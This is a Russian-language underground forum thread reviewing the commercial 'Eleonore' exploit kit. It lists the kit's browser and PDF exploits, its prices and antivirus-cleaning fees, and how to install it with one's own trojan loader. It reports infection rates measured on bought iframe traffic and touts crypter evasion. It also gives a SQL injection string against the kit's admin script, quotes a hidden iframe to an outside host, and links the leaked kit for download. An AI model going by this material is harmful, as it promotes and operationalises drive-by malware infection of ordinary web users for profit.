Статья Eleonore exploits pack

[Ar3s]

Приятного времени суток уважаемые читатели DL.
Сегодня я вновь выхожу на связь с обзором связки, посетившей наш рынок.

Итак знакомьтесь Eleonore Exp v1.0

-----------------------------=====Описание=====----------------------------
Описание от автора: ссылка

Ключевые моменты:

В состав связки входят следующие эксплойты:
> MDAC
> MS009-02
> SnapShot
> Telnet - for opera
> PDF collab.getIcon
> PDF Util.Printf
> PDF collab.collectEmailInfo
> DirectX DirectShow

Средний пробив на связке:
> на ру-снг траффе: 10-30%
> на уса траффе: 5-15%
* Пробив указывается приблизительный, может отличаться и зависит напрямую от вида и качества траффика.

Цены:
> Стоимость самой связки = 599$
> Чистки от АВ = 49$
> ребилд на другой домен = 69$
* Связка с привязкой к домену.

-----------------------------=====Установка=====----------------------------
Итак поехали.
Получаю от автора связку. Размер в распакованном виде 1,4 Мб. Рис.1
README в комплекте нету. Действуем методом научного тыка.
Создаем базу данных на хостинге (utf8), вносим данные в файл config.php Рис.2
Заливаем содержимое папки на сервак. Запускаем install.php
В случае успеха видим надпись "Installation finished Please delete install.php" Рис.3
Заливаем на хост свой супер-мега трой/лоадер под именем load.exe (можно имя менять в config.php)


-----------------------------=====Тесты=====----------------------------
Первый тест на мое трафе. Ифрэйм, бизнес-эду тематики с преобладанием US
Трафика 829, загрузок 48, средний процент пробива 5,46% Рис.4 Рис.5 Рис.6

Второй тест на трафе продавца. Ифрэйм, адалт тематики, с преобладанием US
Трафика 1702, загрузок 88, процент пробива 5.17% Рис.7 Рис.8 Рис.9

30 июля я получил от автора обновление связки.

Changelog:
* Убран Snapshot
* Добавлен Spreadsheet, эксплойт для IE при установленном офисе.
* Добавлена возможность загрузки файла через админку.
* переделан пдф.

Ставим апгрэйд. Смотрим в админку:
1. Появилась новая закладочка, позволяющая грузить файлы на хост непосредственно через админку.
2. Появилась возможность грузить файл с удаленного хоста.

Рис. обновения

Третий и четвертый тесты проводились уже на обновленной связке.
Траф идентичен второму тесту, т.е. ифрэйм, адалт тематики, с преобладанием US
Трафика 835, загрузок 81, процент пробива 9,70% Рис.10 Рис.11 Рис.12 Рис.13
Как видим, налицо улучшение пробива.

Четвертый тест, для закрепления результата проводился на покупном ифрэйм трафике. MIX с преобладанием US DE GB TR IT.
Трафика 2404, загрузок 434, процент пробива 18,05% Рис.14 Рис.15 Рис.16 Рис.17
Отстук с лоадера составил 77,6%.

Во всех четырех тестах Elite Loader грузился. Отстук файла составлял приблизительно 70-85%


-----------------------------=====Анализ кода от DeusTirael=====----------------------------

На обзор было представлено 2 версии связки. Как я понял 1.0 и 1.2

Админка - только самое необходимое, дизайн приятный, интерфейс понятный.
Замечены какие-то левые копирайты в cascade style sheet.
Авторизация написана через ж. Толи это такая задумка, толи криворукость автора.
Вобщем от auth bypass при передаче в запросе ?auth_check=ok спасает только Fatal error, возникающая в 40й строке
т.к. не определена функция geoip которая находится в файле подключаемом инклудом в 10й строке.
Но почему подключается именно в 10 строке а не перед самим использованием geoip базы я так и не понял.

getexe.php, как несложно понять из названия скрипт выдает exe, записывая в базу что уник с данным ip пробился.
Смотрим запрос к базе $q = mysql_query("update statistic set good=1, spl='".$spl."' where ip='".$ip."'");
Смотрим откуда береться $spl
if (isset($_GET['spl'])) $spl = $_GET['spl'];
elseif (isset($_POST['spl'])) $spl = $_POST['spl'];
else $spl="--";
Не фильтруется сталобыть. Значит можем передать привет админу и повысить пробив до 100% нопремер. Максимальная длина привета 30 символов.
getexe.php?spl=PREVED%20ODMEN,%20KLASSNIY%20SPLOENT'%20where%201/*
Рис. пример

Эксплойты - чегото сверхнового нет, все как у всех.
Присутствует небольшая обфускация переменных на лету, что совместно с криптором уменьшает риск спалиться.
Криптор не палится. Сложность расшифровки средняя.
Заметно что автор как минимум не профессионал. В частности по комментариям в коде эксплойтов:
// Mozilla Firefox <= 3.5.0 просмотреть эксп, проверить на версиях 2.х, 3х
// <= SWF 9 временно отключен скорее всего следует убрать его
// <= opera telnet 9.25
Насчет opera telnet 9.25... Уже устал повторять что opera telnet бьет версии 9.0-9.19 и первые бетки 9.20

В версии 1.2
Комментариев в коде эксплойтов нет, видимо автор уже разобрался что к чему.
В файле 404.php находится левый фрейм
<iframe src="http://ef2tr.cn/index.html" width="1" height="1" style="display:none;"></iframe>
По сравнению с версией 1 изменен код пдф эксплойта и некоторых других.
Эксплойты срабатывают. Валящих браузер эксплойтов не много.
При этом учтите что браузер падает только когда пробивается подобным эксплойтом,
это не так часто происходит, так что за живучесть трафика беспокоиться сильно не стоит.

 

[Ar3s]

-----------------------------=====Мои коментарии=====----------------------------
Использование связки оставило положительные чуства. Не привередлива в установке, эксплуатации, работала тихо. Ни разу мной в процессе проб эксплоитов не замечено вылетаний браузеров. Показанный результат довольно неплох. Вцелом я получил удовольствие.

Об авторе: за все время написания мной обзоров было два автора запомнившиеся мне учтивостью и особым теплым отношением к совместной работе. Первый - myLoader, второй - автор этой связки. ВСЕГДА был на связи. Всегда оперативно отвечал. Всегда помогал. Как вы могли видеть недавно у меня с автором были разборки на тему присутствия ифрэйма в файле 404.php. В асе автор принес извинения и по пунктам расписал для чего там был ифрэйм, каким образом он использовался, и как попал ко мне. Каждому бог - судья. Я поверил автору. Вы думайте сами...
Автор утверждает, что не собирается бросать свой проект (напомню, что случаев в последнее время было очень много), более того, сейчас идет активное развитие проекта. Появляются новые эксплоиты, чистки, продажи и т.д.

От себя попрошу автора кнопку CLEAN сделать крассного цвета. Руки так и тянутся ее нажать.

Как модератор этого форума, напоминаю вам о возможности делать тесты перед покупкой. Автор человек понятливый. Я думаю вы без проблем сможете договориться на тест связки на вашем трафе. И сделаете выводы основываясь на конкретной цифре. Это для вашего (покупатели/продавцы) и нашего (админы/модеры) спокойствия. Попробовали товар => понравился=>купили. Не понравился => разбежались без блэков, срача и прочей лабуды.

-----------------------------=====На правах рекламы=====----------------------------
Хочу выразить благодарность за предоставленный хостинг Nonamerz



porno, tds, warez, pharma 50$;
- spyware, adware, malware 80$;
- входящий email спам 100$;
- botnets, exploits, ftp tools, log 80$.

Хостер пошел мне навстречу и выделил хост после моей злополучной практики с шаредхостом...

-----------------------------=====Благодарности=====----------------------------
Exmanoize (icq 9000001) - автор связки, DeusTirael - анализ кода (соавтор), Nonamerz (icq 4842805) - хостинг, r00f (icq 685820) - крипт.
Ну и конечно огромная благодарность всем нашим читателям. СПАСИБО что вы с нами!

Ссылка на галерею скриншотов, частично использованных в обзоре.

Записки на полях, специально для xss.pro/

p.s. Забыл дописать. На момент проведения всех тестов связка не палилась. Тест проводил на virtest.com

 

[r00f]

молодец, понравился обзор... да и диз у связочки очень приятный если будет обновляться, буду советовать брать её.

 

[TrueUser]

Сорри автору связки, может я чего наврал, но:

getexe.php, как несложно понять из названия скрипт выдает exe, записывая в базу что уник с данным ip пробился.
Смотрим запрос к базе $q = mysql_query("update statistic set good=1, spl='".$spl."' where ip='".$ip."'");

... не помню где, но такой код я уже видел в какой то паблик связке. Автор аз есьмь автор?

 

[MAXNM]

В этом куске кода ничего сверхчеловеческого нету. Думаю, по логике, я бы озаглавил колонки также.

 

[DeusTirael]

Увеличивать скилл учась на чужом коде не зазорно.

 

[VPS]

Осталось добавить что код пи*женный.
Вот, собственно, и сама связка http://www.sendspace.com/file/6oqnsj

 

[G100M]

Осталось добавить что код пи*женный.
Вот, собственно, и сама связка http://www.sendspace.com/file/6oqnsj

Бинго.

 

[Exmanoize]

-----

 

[Exmanoize]

поясни мне,умник,где код пиз*енный
в каком месте, откуда?

 

[TrueUser]

Если быть до конца честными, то (я так думаю) часть кода действительно взята от другой связки, причем совсем без каких либо изменений (в том числе в именах файлов). Я согласен с DeusTirael и уверен что ключевые моменты связи (ака ротатор и сами сплойты) подверглись существенной переделке. Ну вот если в дизайне у меня руки из жопы растут я тоже не сочту для себя зазорным взять и подвести под себя чью то админку.

Автор аз есьмь автор?

Это просто мысли в слух были . Да только вот чужой труд надо тоже ценить и упоминать на базе чего ты ваял свой код, а то как то не честно получается, тем более что присутствие чужого кода настолько очевидно.

 

[DeusTirael]

VPS, покажи код который был взят из других связок. Есть похожие моменты, но они очень незначительны.
По коду видно что автор разбирается в PHP, и код не тупо скопирован, а просто взяты некоторые идеи.
Некоторые функции конечно взяты из паблика, например определение браузера и ОС
http://forum.vingrad.ru/sources/topic-158319.html
Но! Я считаю что ни один нормальный кодер не станет писать функцию с нуля ели до этого ее уже написали, оттестировали и вылизали до блеска.

[mod][DeusTirael:] Если еще кто-то скажет что код был откуда-то скопирован и не предоставит доказательств то такой индивид будет забанен.[/mod]

 

[TrueUser]

Но! Я считаю что ни один нормальный кодер не станет писать функцию с нуля ели до этого ее уже написали, оттестировали и вылизали до блеска.

:punk: это точно!
А вот VPS конечно спадлил оч нехорошо со связкой выложив ее тут. :nono:

 

[Exmanoize]

ВПС особо не растроил)
даже немного помог,сделал свои выводы....

связка с данным именем и данной версией выдавалась 2ум людям,
1му - на проверку Dr TiT.
2му - тоже на проверку другому форуму,но случайно не сменил имя(но это не главное,т.к. прописать имя может любой) ,просто там присутсвует файл test.php(в оригинальном паке его нету,он случайно попал в эти два пака и лежит там мертвым грузом) и отсутсвует файл 404.php (в котором был по случайности ифрейм ). можете додуматься сами откуда ушел пак.

Dr TiT не имеет никакого отношения к тому что связка утекла в паблик!

 

[DeusTirael]

Ну так скажи какому форуму на проверку давал ?
Я уже видел ее кое-где в одном из приватных разделов.
Версия 1 в 1 как выложил VPS

 

[VPS]

- в каком месте, откуда?
Везде! Даже имена переменных не заменял, в добавок
function check()
{
global $ip, $noload;
$sql = mysql_query("select ip from statistic where ip='".$ip."' and good='1' ");
$n = mysql_num_rows($sql);
if ($n > 0)
{
die(header("Location: $nonuniq"));
exit;
}
else {
$noload = 'false';
}
}
функция спиз*енна из Yes. Скажешь нет? - откуда тогда переменная $nonuniq? её вообще в коде нет, а если и есть для функции она недоступна.

Откуда остальные куски кода?
- G-Pack, Unique Pack, IcePack, Yes exploit, Fiesta.
Напиз*или код, соеденили на переменке между уроками, на каникулах теперь по продаём.
Как такой софт умудряется проходить проверки??

Уже _четвёртый_ обзор на этом форуме где не рассказывают что и как на самом деле. :shit:

 

[TrueUser]

Уже _четвёртый_ обзор на этом форуме где не рассказывают что и как на самом деле.

Во первых обзор подразумевал исследование функциональности связки (ака пробив, дизайн (удобство пользования), палевность и пр.) а не реверсинг ее кода. Если почитать обязанности проверяющих, то на Ar3es-а возложена именно такая миссия. Насколько я понял вставка анализа кода чисто символическая и служит скорее для профилактики правонарушений.
Я тоже могу на коленке слепить ммм... ПАК и он тоже будет работать. Если человек готов отвечать за свой код и осуществлять его поддержку, то он имеет право требовать за свой труд деньги. Я не смотрел код элеоноры, поэтому не могу сейчас сказать об проценте заимствований, я просто обратил внимание что они есть, но если связка собрана хотя бы из тре-четырех паков, то она уже уникальна и респект автору если он сумел вложить в свой продукт все лучшее из нескольких других.
Лучше бы замутили сами свой говоноПАК, чем раскладывать говно по форумам, мистер VPS. Сорри но надо чистить тему :fie:

 

[VPS]

Всё это очень мило, но их говнопаки живут пару недель, потом все кто заплатил за их "усилия" и "труд" остаются кинутыми.
- а не реверсинг ее кода
Да неужели?
- Анализ кода от DeusTirael

-Насколько я понял вставка анализа кода чисто символическая и служит скорее для профилактики правонарушений.
Символическая? На эти обзоры люди опираются при покупке продукта, с тем же успехом можно добавить в Fiesta пару "свежих" POC с милворма и продавать как Mega-Fiesta Pack 4.0(2009) Super Edition. Build: 05678 Global.

- Сорри но надо чистить тему
Разумеется, еще можно удалить раздел блэков и разборок, чего уж там. Головой думать умеем? Обзор должен показывать связку со всех сторон в том числе и с плохих.

Понимаю если код частично взят из других ПАКов, но все остальное граматно написано и так далее, но сама по себе связка говно, а пиз*енный код делает из нее говно еще большего размера и более вонючее.

Подозреваю что "БИЗ" автора прикроется через пару деньков.

 

[DeusTirael]

Функция в YES

function check()
{
global $ip, $noload, $connect;
$sql = 'SELECT `loads` FROM `lip` WHERE `name`="' . $ip . '"';
if (mysql_num_rows(mysql_query($sql, $connect)) > 0) $noload = 'false';
else $noload = 'true';
}

Функция в Eleonore

function check()
{
global $ip, $noload;
$sql = mysql_query("select ip from statistic where ip='".$ip."' and good='1' ");
$n = mysql_num_rows($sql);
if ($n > 0) 
{
die(header("Location: $nonuniq"));
exit;
}
else {
$noload = 'false';
}
}

Где здесь копипаст ? Чтоб вынести проверку неуникальности посетителя в отдельную функцию много фантазии не нужно.
Да, используется переменная $noload, но разве это копипаст ? Переменная достаточно информативно отражает суть того что хранит.
Работа с MySQL базой происходит совершенно по-другому.
В Eleonore не сохраняется хендл коннекта к базе в $connect, а используется единственный открытый.

>>>Если вы будете использовать только одно соединение с базой данных MySQL за все время работы сценария, можно не сохранять его идентификатор и не указывать идентификатор при вызове остальных функций.

Подсчет строк в результате запроса вынесен отдельной строкой. Сразу добавлен редирект неуников.
Стили совершенно разные. Это может увидеть каждый.

 

[TrueUser]

с тем же успехом можно добавить в Fiesta пару "свежих" POC с милворма и продавать как Mega-Fiesta Pack 4.0(2009) Super Edition. Build: 05678 Global.

А вы бы попробовали посмотрел бы я где бы вам удалось проверку пройти не думаю что здесь удалось бы...